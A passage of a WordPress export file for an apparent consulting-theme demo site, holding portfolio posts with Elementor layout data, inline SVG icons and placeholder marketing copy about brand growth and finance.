<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>818</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:48:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:48:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[insurance-finance]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[819]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"927f8df","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"6791ad66","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"445a200a","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"5789d963","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"788454d6","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"42dad2ce","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1e8fb8bb","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bd5ee3e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"25002852","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1c55a945","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"2736d520","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3616c54e","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"21d1388b","elType":"widget","settings":{"editor":"<p>November 09, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"55401017","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"16c4f4c6","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"307fcf31","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"3b72cfa8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"434e61f3","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"fe64ffb","elType":"section","settings":[],"elements":[{"id":"477f30b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"31bdc11","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"34d01e8","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"cde5139","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"fab4260","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"d03873c","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0ed2aa4","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"8ceaa8a","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"c69fd68","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"fe59a36","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"ec6edfa","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"0031182","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"06dfe1d","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7993daf","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"edbceb2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"c31e94a","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"28ad000","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"b89d5aa","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"611e8de","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"2eca69e","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"0291789","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #4b83fc;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"acc7970","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"7f9d47a","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-2.png","id":1480},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"93eeba8","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Fund Management</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/fund-management/</link>
		<pubDate>Fri, 11 Sep 2020 07:02:07 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=822</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>October 02, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>822</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:02:07]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:02:07]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[fund-management]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[823]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
